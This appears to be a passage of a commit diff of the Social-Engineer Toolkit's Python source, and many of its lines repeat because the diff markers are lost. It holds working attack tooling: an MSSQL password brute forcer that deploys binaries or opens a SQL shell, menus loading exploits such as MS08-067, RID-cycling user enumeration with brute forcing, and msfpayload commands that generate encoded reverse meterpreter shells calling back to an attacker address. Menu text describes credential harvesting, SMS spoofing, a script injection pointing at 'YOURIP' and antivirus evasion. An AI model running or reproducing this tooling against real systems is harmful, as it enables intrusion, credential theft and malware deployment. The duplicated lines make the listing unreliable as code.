print "\nHow do you want to deploy the binary via debug (win2k, winxp, win2003) or powershell (vista,win7)\n\n 1. Windows Powershell\n 2. Windows Debug Conversion\n 3. Standard Windows Shell\n\n 99. Return back to the main menu.\n"
option = raw_input(setprompt(["19","21","22"], "Which deployment option do you want [1]"))
if option == "": option = "2"
# if 99 then break
if option == "99": break
# specify we are using the fasttrack option, this disables some features
filewrite = file("src/program_junk/fasttrack.options", "w")
filewrite.write("none")
filewrite.close()
# import fasttrack
if option == "1" or option == "2":
# import payloads for selection and prep
try: reload(src.core.payloadgen.create_payloads)
except: import src.core.payloadgen.create_payloads
mssql.deploy_hex2binary(success[0], success[2], success[1], success[3], option)
# straight up connect
if option == "3":
mssql.cmdshell(success[0], success[2], success[1], success[3], option)
# increment counter
counter = counter + 1
#
# if we want to connect directly to a SQL server
#
if attack_vector_sql == "2":
sql_server = raw_input(setprompt(["19","21","23"], "Enter the hostname or IP address of the SQL server"))
sql_port = raw_input(setprompt(["19","21","23"], "Enter the SQL port to connect [1433]"))
if sql_port == "": sql_port = "1433"
sql_username = raw_input(setprompt(["19","21","23"], "Enter the username of the SQL Server [sa]"))
# default to sa
if sql_username == "": sql_username = "sa"
sql_password = raw_input(setprompt(["19","21","23"], "Enter the password for the SQL server"))
print_status("Connecting to the SQL server...")
# try connecting
# establish base counter for connection
counter = 0
try:
conn = _mssql.connect(sql_server + ":" + str(sql_port), sql_username, sql_password)
counter = 1
except Exception, e:
print e
print_error("Connection to SQL Server failed. Try again.")
# if we had a successful connection
if counter == 1:
print_status("Dropping into a SQL shell. Type quit to exit.")
# loop forever
while 1:
# enter the sql command
sql_shell = raw_input("Enter your SQL command here: ")
if sql_shell == "quit" or sql_shell == "exit":
print_status("Exiting the SQL shell and returning to menu.")
break
try:
# execute the query
sql_query = conn.execute_query(sql_shell)
# return results
print "\n"
for data in conn:
data = str(data)
data = data.replace("\\n\\t", "\n")
data = data.replace("\\n", "\n")
data = data.replace("{0: '", "")
data = data.replace("'}", "")
print data
except Exception, e:
print_warning("\nIncorrect syntax somewhere. Printing error message: " + str(e))
##################################
##################################
# exploits menu
##################################
##################################
if attack_vector == "2":
# start the menu
create_menu(text.fasttrack_exploits_text1, text.fasttrack_exploits_menu1)
# enter the exploits menu here
range = raw_input(setprompt(["19","24"], "Select the number of the exploit you want"))
##################################
##################################
# exploits menu
##################################
##################################
if attack_vector == "2":
# start the menu
create_menu(text.fasttrack_exploits_text1, text.fasttrack_exploits_menu1)
# enter the exploits menu here
range = raw_input(setprompt(["19","24"], "Select the number of the exploit you want"))
# ms08067
if range == "1":
try: reload(src.fasttrack.exploits.ms08067)
except: import src.fasttrack.exploits.ms08067
# ms08067
if range == "1":
try: reload(src.fasttrack.exploits.ms08067)
except: import src.fasttrack.exploits.ms08067
# firefox 3.6.16
if range == "2":
try: reload(src.fasttrack.exploits.firefox_3_6_16)
except: import src.fasttrack.exploits.firefox_3_6_16
# solarwinds
if range == "3":
try: reload(src.fasttrack.exploits.solarwinds)
except: import src.fasttrack.exploits.solarwinds
# firefox 3.6.16
if range == "2":
try: reload(src.fasttrack.exploits.firefox_3_6_16)
except: import src.fasttrack.exploits.firefox_3_6_16
# solarwinds
if range == "3":
try: reload(src.fasttrack.exploits.solarwinds)
except: import src.fasttrack.exploits.solarwinds
# rdp DoS
if range == "4":
try: reload(src.fasttrack.exploits.rdpdos)
except: import src.fasttrack.exploits.rdpdos
# rdp DoS
if range == "4":
try: reload(src.fasttrack.exploits.rdpdos)
except: import src.fasttrack.exploits.rdpdos
if range == "5":
try: reload(src.fasttrack.exploits.mysql_bypass)
except: import src.fasttrack.exploits.mysql_bypass
if range == "5":
try: reload(src.fasttrack.exploits.mysql_bypass)
except: import src.fasttrack.exploits.mysql_bypass
if range == "6":
try: reload(src.fasttrack.exploits.f5)
except: import src.fasttrack.exploits.f5
if range == "6":
try: reload(src.fasttrack.exploits.f5)
except: import src.fasttrack.exploits.f5
##################################
##################################
# sccm attack menu
##################################
##################################
if attack_vector == "3":
# load sccm attack
try: reload(src.fasttrack.sccm.sccm_main)
except: import src.fasttrack.sccm.sccm_main
##################################
##################################
# sccm attack menu
##################################
##################################
if attack_vector == "3":
# load sccm attack
try: reload(src.fasttrack.sccm.sccm_main)
except: import src.fasttrack.sccm.sccm_main
##################################
##################################
# dell drac default credential checker
##################################
##################################
if attack_vector == "4":
# load drac menu
subprocess.Popen("python %s/src/fasttrack/delldrac.py" % (definepath), shell=True).wait()
##################################
##################################
# dell drac default credential checker
##################################
##################################
if attack_vector == "4":
# load drac menu
subprocess.Popen("python %s/src/fasttrack/delldrac.py" % (definepath), shell=True).wait()
##################################
##################################
# RID ENUM USER ENUMERATION
##################################
##################################
if attack_vector == "5":
print (""".______ __ _______ _______ .__ __. __ __ .___ ___.
##################################
##################################
# RID ENUM USER ENUMERATION
##################################
##################################
if attack_vector == "5":
print (""".______ __ _______ _______ .__ __. __ __ .___ ___.
| _ \ | | | \ | ____|| \ | | | | | | | \/ |
| |_) | | | | .--. | | |__ | \| | | | | | | \ / |
| / | | | | | | | __| | . ` | | | | | | |\/| |
| |\ \----.| | | '--' | | |____ | |\ | | `--' | | | | |
| _| `._____||__| |_______/ _____|_______||__| \__| \______/ |__| |__|
|______|
|______|
""")
print "\nRID_ENUM is a tool that will enumerate user accounts through a rid cycling attack through null sessions. In\norder for this to work, the remote server will need to have null sessions enabled. In most cases, you would use\nthis against a domain controller on an internal penetration test. You do not need to provide credentials, it will\nattempt to enumerate the base RID address and then cycle through 500 (Administrator) to whatever RID you want."
print "\n"
ipaddr = raw_input(setprompt(["31"], "Enter the IP address of server (or quit to exit)"))
if ipaddr == "99" or ipaddr == "quit" or ipaddr == "exit":
break
print_status("Next you can automatically brute force the user accounts. If you do not want to brute force, type no at the next prompt")
dict = raw_input(setprompt(["31"], "Enter path to dictionary file to brute force [enter for built in]"))
# if we are using the built in one
if dict == "":
# write out a file
filewrite = file("src/program_junk/dictionary.txt", "w")
filewrite.write("\nPassword1")
# specify the path
dict = "src/program_junk/dictionary.txt"
print "\nRID_ENUM is a tool that will enumerate user accounts through a rid cycling attack through null sessions. In\norder for this to work, the remote server will need to have null sessions enabled. In most cases, you would use\nthis against a domain controller on an internal penetration test. You do not need to provide credentials, it will\nattempt to enumerate the base RID address and then cycle through 500 (Administrator) to whatever RID you want."
print "\n"
ipaddr = raw_input(setprompt(["31"], "Enter the IP address of server (or quit to exit)"))
if ipaddr == "99" or ipaddr == "quit" or ipaddr == "exit":
break
print_status("Next you can automatically brute force the user accounts. If you do not want to brute force, type no at the next prompt")
dict = raw_input(setprompt(["31"], "Enter path to dictionary file to brute force [enter for built in]"))
# if we are using the built in one
if dict == "":
# write out a file
filewrite = file("src/program_junk/dictionary.txt", "w")
filewrite.write("\nPassword1")
# specify the path
dict = "src/program_junk/dictionary.txt"
# if we are not brute forcing
if dict.lower() == "no":
print_status("No problem, not brute forcing user accounts")
dict = ""
# if we are not brute forcing
if dict.lower() == "no":
print_status("No problem, not brute forcing user accounts")
dict = ""
if dict != "":
print_warning("You are about to brute force user accounts, be careful for lockouts.")
choice = raw_input(setprompt(["31"], "Are you sure you want to brute force [yes/no]"))
if choice.lower() == "n" or choice.lower() == "no":
print_status("Okay. Not brute forcing user accounts *phew*.")
dict = ""
if dict != "":
print_warning("You are about to brute force user accounts, be careful for lockouts.")
choice = raw_input(setprompt(["31"], "Are you sure you want to brute force [yes/no]"))
if choice.lower() == "n" or choice.lower() == "no":
print_status("Okay. Not brute forcing user accounts *phew*.")
dict = ""
# next we see what rid we want to start
start_rid = raw_input(setprompt(["31"], "What RID do you want to start at [500]"))
if start_rid == "": start_rid = "500"
# stop rid
stop_rid = raw_input(setprompt(["31"], "What RID do you want to stop at [15000]"))
if stop_rid == "": stop_rid = "15000"
print_status("Launching RID_ENUM to start enumerating user accounts...")
subprocess.Popen("python src/fasttrack/rid_enum.py %s %s %s %s" % (ipaddr,start_rid,stop_rid,dict), shell=True).wait()
# next we see what rid we want to start
start_rid = raw_input(setprompt(["31"], "What RID do you want to start at [500]"))
if start_rid == "": start_rid = "500"
# stop rid
stop_rid = raw_input(setprompt(["31"], "What RID do you want to stop at [15000]"))
if stop_rid == "": stop_rid = "15000"
print_status("Launching RID_ENUM to start enumerating user accounts...")
subprocess.Popen("python src/fasttrack/rid_enum.py %s %s %s %s" % (ipaddr,start_rid,stop_rid,dict), shell=True).wait()
# once we are finished, prompt.
print_status("Everything is finished!")
pause = raw_input("Press {return} to go back to the main menu.)
# once we are finished, prompt.
print_status("Everything is finished!")
pause = raw_input("Press {return} to go back to the main menu.)
# handle keyboard exceptions
except KeyboardInterrupt:
pass
except KeyboardInterrupt:
pass

68
src/core/menu/text.py
View file

@ -1,8 +1,8 @@
#!/usr/bin/env python
try:
import readline
import readline
except:
pass
pass
from src.core.setcore import bcolors, get_version, check_os, meta_path
# grab version of SET
@ -68,16 +68,16 @@ webattack_menu = ['Java Applet Attack Method',
fasttrack_menu = ['Microsoft SQL Bruter',
'Custom Exploits',
'SCCM Attack Vector',
'Dell DRAC/Chassis Default Checker',
'RID_ENUM - User Enumeration Attack',
'SCCM Attack Vector',
'Dell DRAC/Chassis Default Checker',
'RID_ENUM - User Enumeration Attack',
'0D']
fasttrack_text = ("""
Welcome to the Social-Engineer Toolkit - """ + bcolors.BOLD + """Fast-Track Penetration Testing platform""" + bcolors.ENDC + """. These attack vectors
have a series of exploits and automation aspects to assist in the art of penetration testing. SET
now incorporates the attack vectors leveraged in Fast-Track. All of these attack vectors have been
completely rewritten and customized from scratch as to improve functionality and capabilities.
now incorporates the attack vectors leveraged in Fast-Track. All of these attack vectors have been
completely rewritten and customized from scratch as to improve functionality and capabilities.
""")
fasttrack_exploits_menu1 = ['MS08-067 (Win2000, Win2k3, WinXP)',
@ -89,7 +89,7 @@ fasttrack_exploits_menu1 = ['MS08-067 (Win2000, Win2k3, WinXP)',
'0D']
fasttrack_exploits_text1 = ("""
Welcome to the Social-Engineer Toolkit - Fast-Track Penetration Testing """ + bcolors.BOLD + """Exploits Section""" + bcolors.ENDC + """. This
Welcome to the Social-Engineer Toolkit - Fast-Track Penetration Testing """ + bcolors.BOLD + """Exploits Section""" + bcolors.ENDC + """. This
menu has obscure exploits and ones that are primarily python driven. This will continue to grow over time.
""")
@ -100,7 +100,7 @@ fasttrack_mssql_menu1 = ['Scan and Attack MSSQL',
fasttrack_mssql_text1 = ("""
Welcome to the Social-Engineer Toolkit - Fast-Track Penetration Testing """ + bcolors.BOLD + """Microsoft SQL Brute Forcer""" + bcolors.ENDC + """. This
attack vector will attempt to identify live MSSQL servers and brute force the weak account passwords that
may be found. If that occurs, SET will then compromise the affected system by deploying a binary to
may be found. If that occurs, SET will then compromise the affected system by deploying a binary to
hexadecimal attack vector which will take a raw binary, convert it to hexadecimal and use a staged approach
in deploying the hexadecimal form of the binary onto the underlying system. At this point, a trigger will occur
to convert the payload back to a binary for us.
@ -110,7 +110,7 @@ webattack_text = ("""
The Web Attack module is a unique way of utilizing multiple web-based attacks
in order to compromise the intended victim.
The """ + bcolors.BOLD + """Java Applet Attack""" + bcolors.ENDC + """ method will spoof a Java Certificate and deliver a
The """ + bcolors.BOLD + """Java Applet Attack""" + bcolors.ENDC + """ method will spoof a Java Certificate and deliver a
metasploit based payload. Uses a customized java applet created by Thomas
Werth to deliver the payload.
@ -118,21 +118,21 @@ webattack_text = ("""
browser exploits through an iframe and deliver a Metasploit payload.
The """ + bcolors.BOLD + """Credential Harvester""" + bcolors.ENDC + """ method will utilize web cloning of a web-
site that has a username and password field and harvest all the
site that has a username and password field and harvest all the
information posted to the website.
The """ + bcolors.BOLD + """TabNabbing""" + bcolors.ENDC + """ method will wait for a user to move to a different
tab, then refresh the page to something different.
The """ + bcolors.BOLD + """Man Left in the Middle Attack""" + bcolors.ENDC + """ method was introduced by Kos and
utilizes HTTP REFERER's in order to intercept fields and harvest
The """ + bcolors.BOLD + """Man Left in the Middle Attack""" + bcolors.ENDC + """ method was introduced by Kos and
utilizes HTTP REFERER's in order to intercept fields and harvest
data from them. You need to have an already vulnerable site and in-
corporate <script src="http://YOURIP/">. This could either be from a
compromised site or through XSS.
The """ + bcolors.BOLD + """Web-Jacking Attack""" + bcolors.ENDC + """ method was introduced by white_sheep, Emgent
and the Back|Track team. This method utilizes iframe replacements to
make the highlighted URL link to appear legitimate however when clicked
The """ + bcolors.BOLD + """Web-Jacking Attack""" + bcolors.ENDC + """ method was introduced by white_sheep, Emgent
and the Back|Track team. This method utilizes iframe replacements to
make the highlighted URL link to appear legitimate however when clicked
a window pops up then is replaced with the malicious link. You can edit
the link replacement settings in the set_config if its too slow/fast.
@ -143,12 +143,12 @@ webattack_text = ("""
""")
webattack_vectors_menu = ['Web Templates',
'Site Cloner',
'Site Cloner',
'Custom Import\n',
]
webattack_vectors_text = ("""
The first method will allow SET to import a list of pre-defined web
The first method will allow SET to import a list of pre-defined web
applications that it can utilize within the attack.
The second method will completely clone a website of your choosing
@ -172,7 +172,7 @@ teensy_menu = ['Powershell HTTP GET MSF Payload',
'X10 Arduino Sniffer PDE and Libraries',
'X10 Arduino Jammer PDE and Libraries',
'Powershell Direct ShellCode Teensy Attack',
'Peensy Multi Attack Dip Switch + SDCard Attack',
'Peensy Multi Attack Dip Switch + SDCard Attack',
'0D']
teensy_text = ("""
@ -189,7 +189,7 @@ teensy_text = ("""
This attack vector will create the .pde files necessary to import
into Arduino (the IDE used for programming the Teensy). The attack
vectors range from Powershell based downloaders, wscript attacks,
vectors range from Powershell based downloaders, wscript attacks,
and other methods.
For more information on specifications and good tutorials visit:
@ -205,17 +205,17 @@ teensy_text = ("""
Select a payload to create the pde file to import into Arduino:
""")
sms_attack_menu = ['Perform a SMS Spoofing Attack',
sms_attack_menu = ['Perform a SMS Spoofing Attack',
'Create a Social-Engineering Template',
'0D']
sms_attack_text = ("""
The """ + bcolors.BOLD + """SMS""" + bcolors.ENDC + """ module allows you to specially craft SMS messages and send them
to a person. You can spoof the SMS source.
to a person. You can spoof the SMS source.
This module was created by the team at TB-Security.com.
You can use a predefined template, create your own template or specify
You can use a predefined template, create your own template or specify
an arbitrary message. The main method for this would be to get a user to
click or coax them on a link in their browser and steal credentials or
perform other attack vectors.
@ -231,7 +231,7 @@ wireless_attack_text = """
wireless card and redirect all DNS queries to you. The concept is fairly
simple, SET will create a wireless access point, dhcp server, and spoof
DNS to redirect traffic to the attacker machine. It will then exit out
of that menu with everything running as a child process.
of that menu with everything running as a child process.
You can then launch any SET attack vector you want, for example the Java
Applet attack and when a victim joins your access point and tries going to
@ -241,7 +241,7 @@ wireless_attack_text = """
"""
infectious_menu = ['File-Format Exploits',
infectious_menu = ['File-Format Exploits',
'Standard Metasploit Executable',
'0D']
@ -253,12 +253,12 @@ infectious_text = """
Pick the attack vector you wish to use: fileformat bugs or a straight executable.
"""
# used in create_payloads.py
if operating_system != "windows":
if msf_path != False:
payload_menu_1 = [
payload_menu_1 = [
'Windows Shell Reverse_TCP Spawn a command shell on victim and send back to attacker',
'Windows Reverse_TCP Meterpreter Spawn a meterpreter shell on victim and send back to attacker',
'Windows Reverse_TCP VNC DLL Spawn a VNC server on victim and send back to attacker',
@ -337,7 +337,7 @@ create_payloads_menu = [
'Adobe PDF Embedded EXE Social Engineering (NOJS)',
'Foxit PDF Reader v4.1.1 Title Stack Buffer Overflow',
'Apple QuickTime PICT PnSize Buffer Overflow',
'Nuance PDF Reader v6.0 Launch Stack Buffer Overflow',
'Nuance PDF Reader v6.0 Launch Stack Buffer Overflow',
'Adobe Reader u3D Memory Corruption Vulnerability',
'MSCOMCTL ActiveX Buffer Overflow (ms12-027)\n']
@ -398,9 +398,9 @@ powershell_menu = ['Powershell Alphanumeric Shellcode Injector',
'0D']
powershell_text = ("""
The """ + bcolors.BOLD + """Powershell Attack Vector""" + bcolors.ENDC + """ module allows you to create PowerShell specific attacks. These attacks will allow
you to use PowerShell which is available by default in all operating systems Windows Vista and above. PowerShell
provides a fruitful landscape for deploying payloads and performing functions that do not get triggered by
The """ + bcolors.BOLD + """Powershell Attack Vector""" + bcolors.ENDC + """ module allows you to create PowerShell specific attacks. These attacks will allow
you to use PowerShell which is available by default in all operating systems Windows Vista and above. PowerShell
provides a fruitful landscape for deploying payloads and performing functions that do not get triggered by
preventative technologies.
""")
@ -424,13 +424,13 @@ encoder_menu = ['avoid_utf8_tolower (Normal)',
encoder_text = """
Select one of the below, 'backdoored executable' is typically the best. However,
most still get picked up by AV. You may need to do additional packing/crypting
most still get picked up by AV. You may need to do additional packing/crypting
in order to get around basic AV detection.
"""
dll_hijacker_text = """
The DLL Hijacker vulnerability will allow normal file extenstions to
call local (or remote) .dll files that can then call your payload or
The DLL Hijacker vulnerability will allow normal file extenstions to
call local (or remote) .dll files that can then call your payload or
executable. In this scenario it will compact the attack in a zip file
and when the user opens the file extension, will trigger the dll then
ultimately our payload. During the time of this release, all of these

18
src/core/module_handler.py
View file

@ -19,10 +19,10 @@ print_info_spaces("Social-Engineer Toolkit Third Party Modules menu.")
print_info_spaces("Please read the readme/modules.txt for information on how to create your own modules.\n")
for name in glob.glob("modules/*.py"):
counter = counter + 1
fileopen = file(name, "r")
for line in fileopen:
line = line.rstrip()
match = re.search("MAIN=", line)
@ -32,7 +32,7 @@ for name in glob.glob("modules/*.py"):
line = " " + str(counter) + ". " + line
print line
print "\n 99. Return to the previous menu\n"
print "\n 99. Return to the previous menu\n"
choice = raw_input(setprompt(["9"], ""))
if choice == 'exit':
@ -42,9 +42,9 @@ if choice == '99':
menu_return = "true"
# throw error if not integer
try:
try:
choice = int(choice)
except:
except:
print_warning("An integer was not used try again")
choice = raw_input(setprompt(["9"], ""))
@ -56,7 +56,7 @@ if menu_return == "false":
for name in glob.glob("modules/*.py"):
counter = counter+1
if counter == int(choice):
# get rid of .modules extension
name = name.replace("modules/", "")
@ -66,9 +66,9 @@ if menu_return == "false":
sys.path.append("modules/")
# this will import the third party module
try:
try:
exec("import " + name)
except:
except:
pass
# this will call the main() function inside the python file
@ -76,6 +76,6 @@ if menu_return == "false":
try:
exec("%s.main()" % (name))
# handle the exception if main isn't there
except Exception, e:
except Exception, e:
raw_input(" [!] There was an issue with a module: %s." % (e))
return_continue()

54
src/core/msf_attacks/create_payload.py
View file

@ -17,7 +17,7 @@ definepath=os.getcwd()
define_version = get_version()
users_home = os.getenv("HOME")
# metasploit path
# metasploit path
meta_path=meta_path()
# define if we need apache or not for dll hijacking
@ -45,7 +45,7 @@ for line in apache_check:
###################################################
# USER INPUT: SHOW PAYLOAD MENU #
###################################################
###################################################
inputpdf=""
target=""
exploit = "INVALID"
@ -69,14 +69,14 @@ while exploit == "INVALID":
if exploit == '3': #'Microsoft Windows CreateSizedDIBSECTION Stack Buffer Overflow'
outfile=("template.doc")
if exploit == '4': #'Microsoft Word RTF pFragments Stack Buffer Overflow (MS10-087)'
if exploit == '4': #'Microsoft Word RTF pFragments Stack Buffer Overflow (MS10-087)'
outfile=("template.rtf")
target=("TARGET=1")
if exploit == "5":
outfile = ("template.mov")
if exploit != '3' and exploit != '4' and exploit !="17":
if exploit != '3' and exploit != '4' and exploit !="17":
outfile=("template.pdf")
@ -89,18 +89,18 @@ while exploit == "INVALID":
time.sleep(2)
# 'exploit' has been converted to the string by now, so we need to
# evaluate the string instead of the user input number from here on...
# evaluate the string instead of the user input number from here on...
if exploit == "exploit/windows/fileformat/adobe_pdf_embedded_exe" or exploit == "exploit/windows/fileformat/adobe_pdf_embedded_exe_nojs":
print_info("Default payload creation selected. SET will generate a normal PDF with embedded EXE.")
print """
1. Use your own PDF for attack
2. Use built-in BLANK PDF for attack\n"""
choicepdf = raw_input(setprompt(["4"], ""))
if choicepdf == 'exit':
exit_set()
if choicepdf == '1':
# define if user wants to use their own pdf or built in one
inputpdf=raw_input(setprompt(["4"], "Enter path to your pdf [blank-builtin]"))
@ -129,24 +129,24 @@ if exploit == "dll_hijacking" or exploit == "unc_embed":
exploit_counter=1
if exploit_counter == 0:
###################################################
# USER INPUT: SHOW PAYLOAD MENU 3 #
###################################################
###################################################
debug_msg(me,"printing 'src.core.menu.text.payload_menu_3'",5)
show_payload_menu3 = create_menu(payload_menu_3_text, payload_menu_3)
payload=raw_input(setprompt(["4"], ""))
noencode=0
if payload == 'exit':
exit_set()
if payload == "" : payload="2"
if payload == "" : payload="2"
if payload == '4' or payload == '5' or payload == '6':
noencode=1
payload=ms_payload_3(payload)
# imported from central, grabs ip address
rhost=grab_ipaddress()
@ -237,17 +237,17 @@ if exploit == "dll_hijacking":
if apache == 0:
if not os.path.isfile("%s/src/program_junk/fileformat.file" % (definepath)):
# try:
filewrite=file("src/program_junk/attack_vector","w")
filewrite.write("hijacking")
filewrite.close()
filewrite=file("src/program_junk/site.template","w")
filewrite.write("TEMPLATE=CUSTOM")
filewrite.close()
time.sleep(1)
subprocess.Popen("mkdir src/program_junk/web_clone;cp src/html/msf.exe src/program_junk/web_clone/x", stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait()
child=pexpect.spawn("python src/html/web_server.py")
filewrite=file("src/program_junk/attack_vector","w")
filewrite.write("hijacking")
filewrite.close()
filewrite=file("src/program_junk/site.template","w")
filewrite.write("TEMPLATE=CUSTOM")
filewrite.close()
time.sleep(1)
subprocess.Popen("mkdir src/program_junk/web_clone;cp src/html/msf.exe src/program_junk/web_clone/x", stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait()
child=pexpect.spawn("python src/html/web_server.py")
# except: child.close()
# if we are using apache
# if we are using apache
if apache == 1:
subprocess.Popen("cp src/html/msf.exe %s/x.exe" % (apache_path), shell=True).wait()
@ -257,7 +257,7 @@ if exploit == "dll_hijacking":
print_info("This may take a few to load MSF...")
try:
child1=pexpect.spawn("ruby %s/msfconsole -L -n -r src/program_junk/meta_config" % (meta_path))
except:
except:
try:
child1.close()
except: pass
@ -271,7 +271,7 @@ if exploit == "dll_hijacking":
except: import smtp_client
try:
child1.interact()
except:
except:
if apache == 0:
try:
child.close()

522
src/core/payloadgen/create_payloads.py
View file

@ -40,9 +40,9 @@ linux_meterpreter_multi_command = linux_meterpreter_multi_command.replace(";", "
upx_encode = check_config("UPX_ENCODE=")
upx_path = check_config("UPX_PATH=")
if operating_system != "windows":
if not os.path.isfile(upx_path):
print_error("ERROR: UPX packer was not found. Disabling UPX packing.")
upx_encode = "OFF"
if not os.path.isfile(upx_path):
print_error("ERROR: UPX packer was not found. Disabling UPX packing.")
upx_encode = "OFF"
unc_embed = check_config("UNC_EMBED=")
# add the digital signature stealing
@ -111,24 +111,24 @@ if check_options("IPADDR=") == 0:
data = fileopen.read()
match = re.search("AUTO_DETECT=ON", line)
if match:
try:
ipaddr=socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
ipaddr.connect(('google.com', 0))
ipaddr.settimeout(2)
ipaddr=ipaddr.getsockname()[0]
update_options("IPADDR=" + ipaddr)
try:
ipaddr=socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
ipaddr.connect(('google.com', 0))
ipaddr.settimeout(2)
ipaddr=ipaddr.getsockname()[0]
update_options("IPADDR=" + ipaddr)
except Exception,e:
log(e)
ipaddr=raw_input(setprompt(["4"], "IP address for the payload listener"))
update_options("IPADDR=" + ipaddr)
except Exception,e:
log(e)
ipaddr=raw_input(setprompt(["4"], "IP address for the payload listener"))
update_options("IPADDR=" + ipaddr)
# if AUTO_DETECT=OFF prompt for IP Address
match=re.search("AUTO_DETECT=OFF", data)
if match:
ipaddr=raw_input(setprompt(["4"], "Enter the IP address for the payload (reverse)"))
filewrite.write(ipaddr)
filewrite.close()
ipaddr=raw_input(setprompt(["4"], "Enter the IP address for the payload (reverse)"))
filewrite.write(ipaddr)
filewrite.close()
# payload selection here
try:
@ -141,13 +141,13 @@ try:
encode=""
# this is payload
choice1=""
# this is port
# this is port
choice3=""
if os.path.isfile("src/program_junk/meterpreter_reverse_tcp_exe"):
fileopen=file("src/program_junk/meterpreter_reverse_tcp_exe", "r")
for line in fileopen:
# this reads in the first line of the file which happens to be port
# when calling through core
# this reads in the first line of the file which happens to be port
# when calling through core
choice3=line.rstrip()
# change attack_vector to nothing
attack_vector=""
@ -163,7 +163,7 @@ try:
# USER INPUT: SHOW PAYLOAD MENU 1 #
###################################################
debug_msg(me,"printing 'text.payload_menu_1'",5)
show_payload_menu1 = create_menu(payload_menu_1_text, payload_menu_1)
show_payload_menu1 = create_menu(payload_menu_1_text, payload_menu_1)
choice1 = raw_input(setprompt(["4"], ""))
if operating_system == "windows" or msf_path == False:
@ -186,16 +186,16 @@ try:
if choice1 != "":
choice1 = check_length(choice1,17)
# convert it to a string
choice1 = str(choice1)
choice1 = str(choice1)
custom=0
counter=0
flag=0
encode_stop=0
# Condition testing of 'choice1'
# Will use a dictionary list
if choice1 == "exit":
# Will use a dictionary list
if choice1 == "exit":
exit_set()
if choice1 == '':
@ -232,7 +232,7 @@ try:
if choice1 != "17":
# if not then import the payload selection
choice1 = ms_payload_2(choice1)
choice1 = ms_payload_2(choice1)
# don't do courtesy shell
if counter==0:
@ -243,11 +243,11 @@ try:
print_info("Example: /root/custom.exe")
choice1=raw_input(setprompt(["4"], "Enter the path to your executable"))
if not os.path.isfile(choice1):
while 1:
print_error("ERROR:File not found. Try Again.")
choice1=raw_input(setprompt(["4"], "Enter the path to your executable"))
if os.path.isfile(choice1):
break
while 1:
print_error("ERROR:File not found. Try Again.")
choice1=raw_input(setprompt(["4"], "Enter the path to your executable"))
if os.path.isfile(choice1):
break
update_options("CUSTOM_EXE=%s" % (choice1))
custom=1
@ -256,7 +256,7 @@ try:
check_write=file("src/program_junk/custom.exe", "w")
check_write.write("VALID")
check_write.close()
shutil.copyfile("%s" % (choice1), "msf.exe")
shutil.copyfile("%s" % (choice1), "msf.exe")
shutil.copyfile("msf.exe", "%s/src/program_junk/msf.exe" % (definepath))
# Specify Encoding Option
@ -280,9 +280,9 @@ try:
if encode_stop == 0 and encode != "16" and choice1 != "set/reverse_shell":
###################################################
# USER INPUT: SHOW ENCODER MENU #
###################################################
###################################################
debug_msg (me,"printing 'text.encoder_menu'",5)
show_encoder_menu = create_menu(encoder_text, encoder_menu)
show_encoder_menu = create_menu(encoder_text, encoder_menu)
encode = raw_input(setprompt(["18"], ""))
encoder="true"
@ -296,23 +296,23 @@ try:
encode = "2"
encoder = "true"
# Handle special cases
# Handle special cases
if encode=='' or encode == ' ': encode = '16'
if encode == '16': encount=0
if encode=='14' or encode == '0': encoder="false"
# do dictionary lookup
# do dictionary lookup
encode1 = encoder_type(encode)
encode = "x86/" + encode1
if encode == "x86/MULTIENCODE" or encode == "x86/BACKDOOR":
encode = encode.replace("x86/", "")
# Specify Remote Host if ipaddr.file is missing (should never get here)
if check_options("IPADDR=") == 0:
if check_options("IPADDR=") == 0:
choice2=raw_input(setprompt(["4"], "IP Address of the listener/attacker (reverse) or host/victim (bind shell)"))
update_options("IPADDR=" + choice2)
update_options("IPADDR=" + choice2)
choice2 = check_options("IPADDR=")
choice2 = check_options("IPADDR=")
# grab interface ip address
if os.path.isfile("src/program_junk/interface"):
@ -323,11 +323,11 @@ try:
# specify the port for the listener
if choice3 == "":
if choice1 != "shellcode/multipyinject":
choice3=raw_input(setprompt(["4"], "PORT of the listener [443]"))
if choice1 != "shellcode/multipyinject":
choice3=raw_input(setprompt(["4"], "PORT of the listener [443]"))
if choice3 == '': choice3 = '443'
# this is needed for the set_payload
update_options("PORT=" + choice3)
update_options("PORT=" + choice3)
# if we are using the SET interactive shell then do this
if choice1 == "set/reverse_shell":
@ -361,159 +361,159 @@ try:
if choice1 != "set/reverse_shell":
# if we aren't using shellcodeexec
if choice1 != "shellcode/alphanum":
if choice1 != "shellcode/pyinject":
if choice1 != "shellcode/multipyinject":
generatepayload=subprocess.Popen(r"ruby %s/msfpayload %s LHOST=%s %s %s %s > %s/src/program_junk/%s" % (path,choice1,choice2,portnum,courtesyshell,choice4,definepath,msf_filename), shell=True).wait()
if choice1 != "shellcode/pyinject":
if choice1 != "shellcode/multipyinject":
generatepayload=subprocess.Popen(r"ruby %s/msfpayload %s LHOST=%s %s %s %s > %s/src/program_junk/%s" % (path,choice1,choice2,portnum,courtesyshell,choice4,definepath,msf_filename), shell=True).wait()
# if we are using shellcodeexec
if choice1 == "shellcode/alphanum" or choice1 == "shellcode/pyinject" or choice1 == "shellcode/multipyinject":
if choice1 == "shellcode/alphanum" or choice1 == "shellcode/pyinject":
print ("\nSelect the payload you want to deliver via shellcode injection\n\n 1) Windows Meterpreter Reverse TCP\n 2) Windows Meterpreter (Reflective Injection), Reverse HTTPS Stager\n 3) Windows Meterpreter (Reflective Injection) Reverse HTTP Stager\n 4) Windows Meterpreter (ALL PORTS) Reverse TCP\n")
# select payload
choice9 = raw_input(setprompt(["4"], "Enter the number for the payload [meterpreter_reverse_tcp]"))
# select default meterpreter reverse tcp
if choice9 == "" or choice9 == "1":
choice9 = "windows/meterpreter/reverse_tcp"
# select reverse https
if choice9 == "2":
choice9 = "windows/meterpreter/reverse_https"
# select reverse http
if choice9 == "3":
choice9 = "windows/meterpreter/reverse_http"
# select all ports
if choice9 == "4":
choice9 = "windows/meterpreter/reverse_tcp_allports"
if choice1 == "shellcode/alphanum":
print_status("Generating the payload via msfpayload and generating alphanumeric shellcode...")
subprocess.Popen("ruby %s/msfpayload %s LHOST=%s %s EXITFUNC=thread R > %s/src/program_junk/meterpreter.raw" % (path,choice9,choice2,portnum,definepath), stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait()
